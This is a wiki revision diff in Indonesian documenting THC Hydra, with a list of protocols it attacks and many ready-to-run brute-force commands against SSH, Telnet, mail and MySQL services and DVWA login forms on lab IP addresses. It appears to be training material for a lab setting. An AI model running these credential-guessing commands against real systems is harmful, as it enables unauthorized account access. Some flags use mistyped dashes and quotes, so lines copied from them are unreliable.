Difference between revisions of "Hydra"
		
		
		
		
		
		Jump to navigation
		Jump to search
		
				
		
		
	
| Onnowpurbo (talk | contribs) | Onnowpurbo (talk | contribs)  | ||
| Line 13: | Line 13: | ||
|   Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. |   Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. | ||
| − | Contoh  | + | ==Contoh== | 
|   hydra -L userlist.txt -P password.txt namaprotocol://mesin-korban |   hydra -L userlist.txt -P password.txt namaprotocol://mesin-korban | ||
| Line 27: | Line 27: | ||
|   hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 ssh |   hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 ssh | ||
| − | Untuk DVWA | + | ==Untuk DVWA (HTTP-POST-FORM)== | 
| + | |||
| + |  hydra -L <USER> -P <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>” | ||
|   hydra 192.168.0.108 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-post-form "/DVWA-1.9/login.php:username=admin&password=^PASS^&Login=Login:Login failed" |   hydra 192.168.0.108 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-post-form "/DVWA-1.9/login.php:username=admin&password=^PASS^&Login=Login:Login failed" | ||
| − |   hydra -l admin -p password  | + |   hydra -l admin -p password 192.168.0.102 http-get-form "/DVWA-1.9/login.php:username=^USER^&password=^PASS^&submit=Login:Login failed" | 
| − |   hydra –L UserNameFile –P PasswordFile –e ns –t 32 –u –f –m /DVWA-1. | + | |
| − |   hydra –L userlist.txt –P passwordlist.txt –e ns –t 32 –u –f –m /DVWA-1. | + |   hydra –L UserNameFile –P PasswordFile –e ns –t 32 –u –f –m /DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login <IP> http-post-form | 
| − |   hydra -L dvwauser.txt -P dvwapass.txt 192.168.0. | + | |
| + |   hydra –L userlist.txt –P passwordlist.txt –e ns –t 32 –u –f –m /DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login 192.168.0.102 http-post-form | ||
| + | |||
| + |   hydra -L dvwauser.txt -P dvwapass.txt 192.168.0.102 http-post-form "/DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" | ||
Revision as of 05:41, 19 February 2020
Hydra adalah network log yang sangat terkenal dan dihormati oleh cracker yang dapat mendukung layanan yang berbeda.
System yang di serang
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, S7-300, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Contoh
hydra -L userlist.txt -P password.txt namaprotocol://mesin-korban hydra -L userlist.txt -P passwordlist.txt ssh://192.168.0.80 hydra -L userlist.txt -P passwordlist.txt -e ns -u -f ssh://192.168.0.80 hydra -L userlist.txt -P passwordlist.txt -e ns -u -f telnet://192.168.0.80 hydra -L userlist.txt -P passwordlist.txt -e ns -u -f pop3://192.168.0.80 hydra -L userlist.txt -P passwordlist.txt -e ns -u -f imap://192.168.0.80 hydra -L userlist.txt -P passwordlist.txt -e ns -u -f 192.168.0.80 mysql
hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 mysql hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 telnet hydra -L /usr/share/nmap/nselib/data/dvwauser.txt -P /usr/share/nmap/nselib/data/dvwapass.txt 192.168.0.97 ssh
Untuk DVWA (HTTP-POST-FORM)
hydra -L <USER> -P <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>”
hydra 192.168.0.108 -l admin -P /usr/share/set/src/fasttrack/wordlist.txt http-post-form "/DVWA-1.9/login.php:username=admin&password=^PASS^&Login=Login:Login failed"
hydra -l admin -p password 192.168.0.102 http-get-form "/DVWA-1.9/login.php:username=^USER^&password=^PASS^&submit=Login:Login failed"
hydra –L UserNameFile –P PasswordFile –e ns –t 32 –u –f –m /DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login <IP> http-post-form
hydra –L userlist.txt –P passwordlist.txt –e ns –t 32 –u –f –m /DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login 192.168.0.102 http-post-form
hydra -L dvwauser.txt -P dvwapass.txt 192.168.0.102 http-post-form "/DVWA-1.9/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"
Referensi
- https://www.thc.org/thc-hydra/
- http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-online-web-form-passwords-with-thc-hydra-burp-suite-0160643/
General usage and options
- http://www.aldeid.com/wiki/Thc-hydra
- http://resources.infosecinstitute.com/online-dictionary-attack-with-hydra/
HTTP basic auth
- https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29
- http://www.sillychicken.co.nz/Security/how-to-brute-force-your-router-in-windows.html
HTTP form based auth
- http://www.art0.org/security/performing-a-dictionary-attack-on-an-http-login-form-using-hydra
- http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html
- http://www.sillychicken.co.nz/Security/how-to-brute-force-http-forms-in-windows.html
- https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29
Multiple protocols
- http://wiki.bywire.org/Hydra
- http://www.attackvector.org/brute-force-with-thc-hydra/
- http://www.madirish.net/content/hydra-brute-force-utility